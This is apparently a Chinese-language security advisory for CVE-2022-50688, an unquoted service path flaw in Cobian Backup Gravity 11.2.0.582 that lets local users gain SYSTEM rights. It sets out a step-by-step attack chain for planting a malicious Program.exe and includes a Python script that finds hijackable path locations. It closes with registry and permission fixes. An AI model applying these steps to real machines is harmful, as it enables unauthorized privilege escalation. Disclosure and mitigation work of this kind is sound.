CVE-2022-50688 Cobian Backup Gravity 未引号服务路径本地提权漏洞

漏洞信息

漏洞编号

CVE-2022-50688

漏洞类型

未引号服务路径

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Cobian Backup Gravity 11.2.0.582

漏洞概述

Cobian Backup Gravity 11.2.0.582版本存在未引号服务路径（Unquoted Service Path）漏洞，这是一个本地权限提升漏洞。攻击者利用该漏洞可以在Windows系统中获得LocalSystem级别的高权限访问。该漏洞允许本地用户通过在服务可执行文件路径中插入恶意程序来劫持服务启动过程。当Windows服务启动时，系统会根据服务路径查找并执行可执行文件，如果路径中包含空格且未被引号正确包裹，系统会从左到右尝试匹配路径中的各个部分，这为攻击者提供了可乘之机。攻击者只需创建与路径中某个组件同名的恶意可执行文件，即可使其在服务重启时被执行，从而以系统最高权限运行任意代码。此漏洞影响所有运行受影响版本Cobian Backup Gravity的Windows系统，攻击者需要具有本地访问权限即可实施攻击。

技术细节

未引号服务路径漏洞源于Windows操作系统解析服务路径的方式。当服务配置中的可执行文件路径包含空格但未被引号包裹时，Windows会从路径的第一个空格处分割并尝试执行每个分割后的单词作为可执行文件。例如，如果服务路径为C:\Program Files\Cobian Backup\cobian.exe且未加引号，Windows会依次尝试执行C:\Program.exe、C:\Program Files\Cobian.exe等。攻击者利用此特性，在受影响的目录下创建一个恶意的可执行文件（如Program.exe），当服务重启或系统启动时，恶意程序将以服务账户（通常是LocalSystem）的权限被执行，从而实现权限提升。在Cobian Backup Gravity案例中，CobianBackup11服务存在此漏洞，攻击者需要具有写入C:\Program Files\目录的权限即可实施攻击。成功利用此漏洞后，攻击者可以获得完全的系统控制权，执行任意命令、安装后门或窃取敏感数据。

攻击链分析

STEP 1

步骤1

攻击者获取目标系统的本地访问权限，识别Cobian Backup Gravity 11.2.0.582是否安装并运行CobianBackup11服务

STEP 2

步骤2

使用sc query或wmic命令查询服务配置，确认BINARY_PATH_NAME是否包含空格且未被引号包裹

STEP 3

步骤3

分析服务路径，识别路径中包含空格但不含.exe后缀的目录组件，如C:\Program Files\Cobian Backup

STEP 4

步骤4

在可利用的路径位置创建恶意可执行文件（如Program.exe），该文件包含攻击载荷

STEP 5

步骤5

等待服务重启或系统重启，Windows服务管理器在启动服务时会按顺序查找并执行路径中的可执行文件

STEP 6

步骤6

恶意程序以LocalSystem权限被执行，攻击者成功获得系统最高权限，完成本地提权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2022-50688 PoC - Cobian Backup Gravity Unquoted Service Path
# This PoC demonstrates the unquoted service path vulnerability in CobianBackup11 service

import subprocess
import os
import sys

def check_vulnerable_service():
    """Check if the CobianBackup11 service has an unquoted service path"""
    try:
        # Query service configuration using sc command
        result = subprocess.run(
            ['sc', 'qc', 'CobianBackup11'],
            capture_output=True,
            text=True
        )
        output = result.stdout
        
        # Check for BINARY_PATH_NAME in output
        if 'BINARY_PATH_NAME' in output:
            print("[+] Found CobianBackup11 service")
            for line in output.split('\n'):
                if 'BINARY_PATH_NAME' in line:
                    path = line.split(':', 1)[1].strip()
                    print(f"[+] Service path: {path}")
                    
                    # Check if path is unquoted and contains spaces
                    if ' ' in path and not path.startswith('"'):
                        print("[!] VULNERABLE: Path is unquoted and contains spaces")
                        return True, path
                    else:
                        print("[-] Service path is properly quoted or has no spaces")
                        return False, path
        else:
            print("[-] CobianBackup11 service not found")
            return False, None
            
    except Exception as e:
        print(f"[-] Error checking service: {e}")
        return False, None

def exploit_unquoted_path():
    """
    Exploit the unquoted service path vulnerability
    Attack: Place a malicious executable in a path component before the actual executable
    """
    vulnerable, service_path = check_vulnerable_service()
    
    if not vulnerable:
        print("[-] Service is not vulnerable to unquoted path attack")
        return
    
    # Extract path components
    path_parts = service_path.replace('"', '').split('\\')
    
    # Find exploitable path component (contains space and before .exe)
    for i, part in enumerate(path_parts):
        if ' ' in part and not part.endswith('.exe'):
            exploit_path = '\\'.join(path_parts[:i+1]) + '.exe'
            print(f"[!] Potential exploit target: {exploit_path}")
            print(f"[!] An attacker could place malicious code at: {exploit_path}")
            print("[!] When the service restarts, this code will execute with SYSTEM privileges")
            break

if __name__ == '__main__':
    print("="*60)
    print("CVE-2022-50688 - Cobian Backup Gravity Unquoted Service Path")
    print("="*60)
    exploit_unquoted_path()
    print("\n[!] Note: This PoC is for educational purposes only.")

影响范围

Cobian Backup Gravity 11.2.0.582

防御指南

临时缓解措施

如果无法立即升级，可通过修改注册表中HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CobianBackup11的ImagePath值为带引号的完整路径（如"C:\Program Files\Cobian Backup\Cobian Backup 11\Cobian.exe"）来临时缓解。同时确保C:\Program Files\Cobian Backup目录及其子目录的写入权限仅授予受信任的管理员账户。